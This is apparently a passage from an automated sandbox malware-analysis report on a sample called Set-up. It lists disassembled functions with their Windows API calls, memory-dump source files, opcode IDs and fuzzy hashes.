                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: _errnorealloc
                          • String ID:
                          • API String ID: 3650671883-0
                          • Opcode ID: 2ca1cc517e0f7155019b6622fee31838b0ee51dda17d19439f915af180046842
                          • Instruction ID: 29412c94c5a9c8d93f0f02e8b3fa4e07b042ebb04993d3f93e5a9eda0523417f
                          • Opcode Fuzzy Hash: 2ca1cc517e0f7155019b6622fee31838b0ee51dda17d19439f915af180046842
                          • Instruction Fuzzy Hash: C3F09071900A118BCB10AF28CC85259BBE4FF85330B654796EC14CB2D5E734DD82EBA2
                          APIs
                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,00BDD471,00000050,crypto/bio/bio_lib.c,00000053,?,?,?,00BDD52B,00000000,00A61A70,00BE48ED,00FFD9FC), ref: 00C3CA8C
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,00000000,00A61A70), ref: 00C3CA9E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: mallocmemset
                          • String ID:
                          • API String ID: 2882185209-0
                          • Opcode ID: 6a4c551ac88b568bf51d457acfe3b62999c7da9af08b8efacab2886980a0da8a
                          • Instruction ID: 1194027b363ae072ee01cadcbca21f6048ef40629a6d3690f5801ad7916991f9
                          • Opcode Fuzzy Hash: 6a4c551ac88b568bf51d457acfe3b62999c7da9af08b8efacab2886980a0da8a
                          • Instruction Fuzzy Hash: 9A01F5A5B1034627E620E1656CC5B5F67888BD2714F180430F954F2282E656D948B3B2
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00F3E571), ref: 00F3EBF3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: f1c130eb67dcf522bc2f43d60b2369af1bc4e79302a7908e16c5a14c1365b9d1
                          • Instruction ID: e0207337b97752eb7b0eb8501d7b85c15d1ebf06d5d8e6a5ad3274c9b82ad853
                          • Opcode Fuzzy Hash: f1c130eb67dcf522bc2f43d60b2369af1bc4e79302a7908e16c5a14c1365b9d1
                          • Instruction Fuzzy Hash: 9701BBB4A087008BDF15BF79D8C562AB7E0EF94320F554C59E885CB386D634D890EB52
                          APIs
                          • getsockname.WS2_32(?,?,00000080), ref: 00B2AFD0
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: getsockname
                          • String ID:
                          • API String ID: 3358416759-0
                          • Opcode ID: 446c28e8025ed82159f871e8a0edb6e7f07ffb9bc95eb1bbbf766ab084a87cdc
                          • Instruction ID: ccc4bfbfb56a8836f82025cc3fdbdc0de171cfb3e960f8c004e105f4f56b9e02
                          • Opcode Fuzzy Hash: 446c28e8025ed82159f871e8a0edb6e7f07ffb9bc95eb1bbbf766ab084a87cdc
                          • Instruction Fuzzy Hash: 30119670808785AAEB268F18E402BE6F3F4EFD0329F108A59E9D942150F73659C5CBC2
                          APIs
                          • send.WS2_32(?,?,?,00000000), ref: 00B2A97E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: be227541b2f9a69cb71edfd2dc8ba95acec1260566803560e656f0b949abfddb
                          • Instruction ID: 2dae9c663271fad4bf79df5b3241e74377092ae6414591198918d0305699b8ee
                          • Opcode Fuzzy Hash: be227541b2f9a69cb71edfd2dc8ba95acec1260566803560e656f0b949abfddb
                          • Instruction Fuzzy Hash: 5601A271B00710AFC7148F15EC45B56BBA5FF84B20F06825DFA982B361C331AC548BD1
                          APIs
                          • socket.WS2_32(?,00B2B280,00000000), ref: 00B2AF66
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: socket
                          • String ID:
                          • API String ID: 98920635-0
                          • Opcode ID: daed6c2d5dfccf367bd9388339f9dd7f2cc6205163817a23bdb3b2a8f8906717
                          • Instruction ID: 6fd30f7abaa680cf310d52265906b88c965d94fb313f21b72906f9d08b5c9901
                          • Opcode Fuzzy Hash: daed6c2d5dfccf367bd9388339f9dd7f2cc6205163817a23bdb3b2a8f8906717
                          • Instruction Fuzzy Hash: 5CE0E5B2A052216BD5549E58F8449ABF7ADEFC8F20F054A4DF86457204C374EC5087E2
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: closesocket
                          • String ID:
                          • API String ID: 2781271927-0
                          • Opcode ID: 8dcd04b7fb75cf73e56fb162b0e4df88740368f64942e76f45f92d4fe4a37da8
                          • Instruction ID: c92b2c5d109a64696c6e56cfa6b8aa573491ca89e083f65e6be89661a029f887
                          • Opcode Fuzzy Hash: 8dcd04b7fb75cf73e56fb162b0e4df88740368f64942e76f45f92d4fe4a37da8
                          • Instruction Fuzzy Hash: 35E0EC3460020197CE259A14E988E5777ABBFC0710F68CAA8E46C8A595DB3BDC46C741
                          APIs
                          • ioctlsocket.WS2_32(?,8004667E), ref: 00AC67FB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: ioctlsocket
                          • String ID:
                          • API String ID: 3577187118-0
                          • Opcode ID: bb7fe173626f72dd25d139c391a357e594df2bab381244547f2a0f453f7f01b6
                          • Instruction ID: 6420584272aef3628172251e178e576971aced61fd28b0a2ff17eca037b12389
                          • Opcode Fuzzy Hash: bb7fe173626f72dd25d139c391a357e594df2bab381244547f2a0f453f7f01b6
                          • Instruction Fuzzy Hash: 7BC012F1108200EFC70C4B24D449A5E7BE9EB48365F01441CB086C2180DB759850CF16
                          APIs
                            • Part of subcall function 00B1A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A499
                            • Part of subcall function 00B1A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00B1A4FB
                            • Part of subcall function 00B1A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00B1AA19
                            • Part of subcall function 00B19B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,00B192A4,?,?,?,?,?,?,?,?,00000000), ref: 00B19B6E
                            • Part of subcall function 00B19B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00B14860,00000000), ref: 00B19C24
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 00B193C3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: AdaptersAddressesgetenv$Openmemcpy
                          • String ID:
                          • API String ID: 1905038125-0
                          • Opcode ID: f4dff10671227da368bd372dc43691be0423c3d09269e12cd4ea23eaa114841f
                          • Instruction ID: 82b210c155eebd21f5cf369619f3b20384749389c1fa21f5e7db1897d6e91b2f
                          • Opcode Fuzzy Hash: f4dff10671227da368bd372dc43691be0423c3d09269e12cd4ea23eaa114841f
                          • Instruction Fuzzy Hash: F551D671904342ABE720DF25E8957AABBE4FF94354F48057CF84983651E731E8A4DB82
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,00F3EBE5,?,?,?,?,?,00F3E571), ref: 00F42B55
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 6c3628d5ffeb147711d21bdcddb38810c03cc16d26124daee7e440dd0ed5c1e7
                          • Instruction ID: 852357b6f5206ab8a682cdd4af467155cbf7ae067895e5338aac2c519c7da892
                          • Opcode Fuzzy Hash: 6c3628d5ffeb147711d21bdcddb38810c03cc16d26124daee7e440dd0ed5c1e7
                          • Instruction Fuzzy Hash: A9E0C9B46047448B8760FE29C8C1617FBE4FE98714B450A6CE8CA47251D770E944AB72
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00F3EBF0,?,?,?,?,?,00F3E571), ref: 00F43BD1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 29527eb662f17c40dfe39d8a47a766f1a3c65cfc431bb7e473818b5bd509d72c
                          • Instruction ID: 85637493ee1fea5c5615b2348405dd89763231d0880a337cbb18801269e7fd85
                          • Opcode Fuzzy Hash: 29527eb662f17c40dfe39d8a47a766f1a3c65cfc431bb7e473818b5bd509d72c
                          • Instruction Fuzzy Hash: 8BD0A7719043484FC7007E588CC150A3794BAA4314F800A5CDDC81B242D7359514E7A2
                          APIs
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C17254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00C140BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C3CBD2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 693b693258a7765fe13f7b37b06a4ffee1b3086ec49691b56b5886970f7c0844
                          • Instruction ID: edf532bf2cbb4eb137205148e5ecccf1c13126a845e17b58f7e72284f8ab1e8f
                          • Opcode Fuzzy Hash: 693b693258a7765fe13f7b37b06a4ffee1b3086ec49691b56b5886970f7c0844
                          • Instruction Fuzzy Hash: FEB092AA5140449BEA067618BCC382EB265E6A0708F948931F909D10F1D6219D15B6A2
                          APIs
                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00AD6E74
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00AD6F8A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00AD7184
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD7263
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00AD75B8
                            • Part of subcall function 00C2F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 00C2F8AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                          • Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$memcmpmemsetstrcpystrlen
